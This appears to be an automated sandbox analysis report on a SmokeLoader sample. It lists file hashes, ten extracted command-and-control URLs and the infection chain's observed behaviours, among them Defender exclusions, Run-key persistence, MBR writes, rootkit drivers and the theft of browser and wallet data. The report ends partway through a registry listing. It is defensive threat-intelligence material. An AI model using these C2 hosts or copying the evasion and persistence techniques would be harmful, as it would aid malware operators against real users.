Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
27-02-2024 05:37
Static task
static1
Behavioral task
behavioral1
Sample
c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe
Resource
win10v2004-20240226-en
General
-
Target
c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe
-
Size
163KB
-
MD5
636c32103ef487d1c30df530296f014b
-
SHA1
f280007f3c78b0823d8978bec1c1cdf792bf5fc6
-
SHA256
c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd
-
SHA512
2a01b0fb459a710c4d8ffb20fe2907bbb5ca091769cb8b3216d909208ee662f9c2f6f035fa1c8aeb9222ee7018c6da15615414b2556e02f0bbcc3bd05337f604
-
SSDEEP
3072:eQ37N6u0D0i+zGJKHZj+4M48iIp2WZnFzw0I:eK8u0Qi+yQHZEiIttw
Malware Config
Extracted
smokeloader
2022
http://selebration17io.io/index.php
http://vacantion18ffeu.cc/index.php
http://valarioulinity1.net/index.php
http://buriatiarutuhuob.net/index.php
http://cassiosssionunu.me/index.php
http://sulugilioiu19.net/index.php
http://goodfooggooftool.net/index.php
http://kamsmad.com/tmp/index.php
http://souzhensil.ru/tmp/index.php
http://teplokub.com.ua/tmp/index.php
Extracted
smokeloader
pub1
Signatures
-
DcRat 5 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exeC8CD.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C8CD.exe 1052 schtasks.exe 2192 schtasks.exe 2584 schtasks.exe -
Glupteba payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/1280-197-0x0000000002A70000-0x000000000335B000-memory.dmp family_glupteba behavioral1/memory/1280-200-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1280-207-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1280-291-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1968-294-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1968-328-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1548-368-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Processes:
288c47bbc1871b439df19ff4df68f076.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe -
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2956-398-0x0000000140000000-0x00000001405E8000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs -
Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2460-69-0x0000000000400000-0x0000000002D8C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/2460-123-0x0000000000400000-0x0000000002D8C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM -
Detects Windows executables referencing non-Windows User-Agents 6 IoCs
Processes:
resource yara_rule behavioral1/memory/1280-200-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/1280-207-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/1280-291-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/1968-294-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/1968-328-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/1548-368-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA -
Detects executables Discord URL observed in first stage droppers 6 IoCs
Processes:
resource yara_rule behavioral1/memory/1280-200-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral1/memory/1280-207-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral1/memory/1280-291-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral1/memory/1968-294-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral1/memory/1968-328-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral1/memory/1548-368-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL -
Detects executables containing URLs to raw contents of a Github gist 6 IoCs
Processes:
resource yara_rule behavioral1/memory/1280-200-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral1/memory/1280-207-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral1/memory/1280-291-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral1/memory/1968-294-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral1/memory/1968-328-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral1/memory/1548-368-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL -
Detects executables containing artifacts associated with disabling Widnows Defender 6 IoCs
Processes:
resource yara_rule behavioral1/memory/1280-200-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral1/memory/1280-207-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral1/memory/1280-291-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral1/memory/1968-294-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral1/memory/1968-328-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral1/memory/1548-368-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender -
Detects executables referencing many varying, potentially fake Windows User-Agents 6 IoCs
Processes:
resource yara_rule behavioral1/memory/1280-200-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral1/memory/1280-207-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral1/memory/1280-291-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral1/memory/1968-294-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral1/memory/1968-328-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral1/memory/1548-368-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA -
Modifies boot configuration data using bcdedit 14 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 568 bcdedit.exe 2520 bcdedit.exe 1880 bcdedit.exe 2312 bcdedit.exe 2220 bcdedit.exe 2888 bcdedit.exe 2968 bcdedit.exe 2936 bcdedit.exe 1672 bcdedit.exe 2012 bcdedit.exe 3004 bcdedit.exe 2136 bcdedit.exe 1360 bcdedit.exe 2660 bcdedit.exe -
UPX dump on OEP (original entry point) 7 IoCs
Processes:
resource yara_rule behavioral1/memory/2352-51-0x0000000000400000-0x0000000000848000-memory.dmp UPX behavioral1/memory/2352-48-0x0000000000400000-0x0000000000848000-memory.dmp UPX behavioral1/memory/2352-52-0x0000000000400000-0x0000000000848000-memory.dmp UPX behavioral1/memory/2352-53-0x0000000000400000-0x0000000000848000-memory.dmp UPX behavioral1/memory/2352-54-0x0000000000400000-0x0000000000848000-memory.dmp UPX behavioral1/memory/2352-55-0x0000000000400000-0x0000000000848000-memory.dmp UPX behavioral1/memory/2352-202-0x0000000000400000-0x0000000000848000-memory.dmp UPX -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
csrss.exedescription ioc process File created C:\Windows\system32\drivers\Winmon.sys csrss.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 1648 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
pid process 1288 -
Executes dropped EXE 24 IoCs
Processes:
B396.exeC8CD.exeC8CD.exeD607.exeE564.exeE564.tmp43A.exe1C6C.exe288c47bbc1871b439df19ff4df68f076.exeInstallSetup4.exeBroomSetup.exeFourthX.exe4580.exenst66EF.tmp288c47bbc1871b439df19ff4df68f076.execsrss.exepatch.exeinjector.exevueqjgslwynd.exehwgsargrdgsargdsefix.exewindefender.exewindefender.exepid process 2132 B396.exe 2912 C8CD.exe 2352 C8CD.exe 2460 D607.exe 1636 E564.exe 2176 E564.tmp 2260 43A.exe 2780 1C6C.exe 1280 288c47bbc1871b439df19ff4df68f076.exe 1376 InstallSetup4.exe 1764 BroomSetup.exe 2320 FourthX.exe 1380 4580.exe 1172 nst66EF.tmp 1968 288c47bbc1871b439df19ff4df68f076.exe 1548 csrss.exe 2956 patch.exe 1944 injector.exe 616 vueqjgslwynd.exe 2240 hwgsarg 1964 rdgsarg 2924 dsefix.exe 436 windefender.exe 1772 windefender.exe -
Loads dropped DLL 44 IoCs
Processes:
WerFault.exeregsvr32.exeC8CD.exeC8CD.exeE564.exeE564.tmp43A.exeInstallSetup4.exeWerFault.exe288c47bbc1871b439df19ff4df68f076.exenst66EF.tmppatch.execsrss.exepid process 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2496 regsvr32.exe 2912 C8CD.exe 2352 C8CD.exe 1636 E564.exe 2176 E564.tmp 2176 E564.tmp 2176 E564.tmp 2176 E564.tmp 2260 43A.exe 2260 43A.exe 2260 43A.exe 2260 43A.exe 2260 43A.exe 1376 InstallSetup4.exe 1376 InstallSetup4.exe 2624 WerFault.exe 2624 WerFault.exe 2624 WerFault.exe 2624 WerFault.exe 2624 WerFault.exe 1376 InstallSetup4.exe 1376 InstallSetup4.exe 1376 InstallSetup4.exe 1968 288c47bbc1871b439df19ff4df68f076.exe 1968 288c47bbc1871b439df19ff4df68f076.exe 864 1172 nst66EF.tmp 2956 patch.exe 1172 nst66EF.tmp 2956 patch.exe 1548 csrss.exe 2956 patch.exe 2956 patch.exe 2956 patch.exe 464 464 1376 InstallSetup4.exe 2956 patch.exe 2956 patch.exe 2956 patch.exe 1548 csrss.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/2352-51-0x0000000000400000-0x0000000000848000-memory.dmp upx behavioral1/memory/2352-48-0x0000000000400000-0x0000000000848000-memory.dmp upx behavioral1/memory/2352-52-0x0000000000400000-0x0000000000848000-memory.dmp upx behavioral1/memory/2352-53-0x0000000000400000-0x0000000000848000-memory.dmp upx behavioral1/memory/2352-54-0x0000000000400000-0x0000000000848000-memory.dmp upx behavioral1/memory/2352-55-0x0000000000400000-0x0000000000848000-memory.dmp upx behavioral1/memory/2352-202-0x0000000000400000-0x0000000000848000-memory.dmp upx -
Processes:
288c47bbc1871b439df19ff4df68f076.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 288c47bbc1871b439df19ff4df68f076.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
C8CD.exe288c47bbc1871b439df19ff4df68f076.execsrss.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C8CD.exe Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
D607.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 D607.exe -
Drops file in System32 directory 4 IoCs
Processes:
vueqjgslwynd.exepowershell.exeFourthX.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe vueqjgslwynd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe FourthX.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
C8CD.exevueqjgslwynd.exedescription pid process target process PID 2912 set thread context of 2352 2912 C8CD.exe C8CD.exe PID 616 set thread context of 856 616 vueqjgslwynd.exe conhost.exe PID 616 set thread context of 1560 616 vueqjgslwynd.exe explorer.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
288c47bbc1871b439df19ff4df68f076.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN 288c47bbc1871b439df19ff4df68f076.exe -
Drops file in Windows directory 7 IoCs
Processes:
wusa.exewusa.execsrss.exemakecab.exe288c47bbc1871b439df19ff4df68f076.exedescription ioc process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Logs\CBS\CbsPersist_20240227053914.cab makecab.exe File opened for modification C:\Windows\rss 288c47bbc1871b439df19ff4df68f076.exe File created C:\Windows\rss\csrss.exe 288c47bbc1871b439df19ff4df68f076.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1868 sc.exe 2312 sc.exe 1744 sc.exe 708 sc.exe 1612 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2468 2132 WerFault.exe B396.exe 2624 1380 WerFault.exe 4580.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe1C6C.exehwgsargdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1C6C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hwgsarg Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hwgsarg Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c79f0b410c62adbad0d697c85f0f6cf786c61e1a1244090650440d8a09b90bbd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1C6C.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1C6C.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hwgsarg -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
nst66EF.tmpdescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nst66EF.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nst66EF.tmp -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 1052 schtasks.exe 2192 schtasks.exe 2584 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
288c47bbc1871b439df19ff4df68f076.exenetsh.exeexplorer.exepowershell.execsrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates explorer.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs explorer.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) 